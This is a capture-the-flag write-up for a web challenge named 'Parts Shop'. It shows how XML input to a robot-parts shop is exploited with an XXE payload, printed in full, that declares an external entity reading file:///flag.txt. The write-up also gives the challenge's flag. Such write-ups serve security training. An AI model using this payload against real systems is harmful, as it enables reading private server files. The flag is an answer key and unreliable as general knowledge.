Parts Shop

Description

Parts Shop [Web]

We've found an online shop for robot parts. We suspect ARIA is trying to embody itself to take control of the physical world. You need to stop it ASAP! (Note: The flag is located in /flag.txt)

https://uscybercombine-s4-parts-shop.chals.io/

Solution

The app allows us to view and add parts:

Add test item:

It seems like image is getting embedded and it can be a link

Since we need /flag.txt this could probably be LFI with file:// protocol

We are sending new parts data as XML

Looks like we can't utilize file protocol:

Since XML is being sent we could try XXE payloads to embed the contents of file into item.

https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/XXE%20Injection/README.md

Payload:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE name [<!ENTITY flag SYSTEM 'file:///flag.txt'>]>
<part>
  <name>&flag;</name>
  <author>test2</author>
  <image>test3</image>
  <description>test4</description>
</part>

Flag: SIVBGR{fu11y_upgr4d3d} {: .prompt-tip }

PreviousI Want to Believe NextSCS

Last updated 1 month ago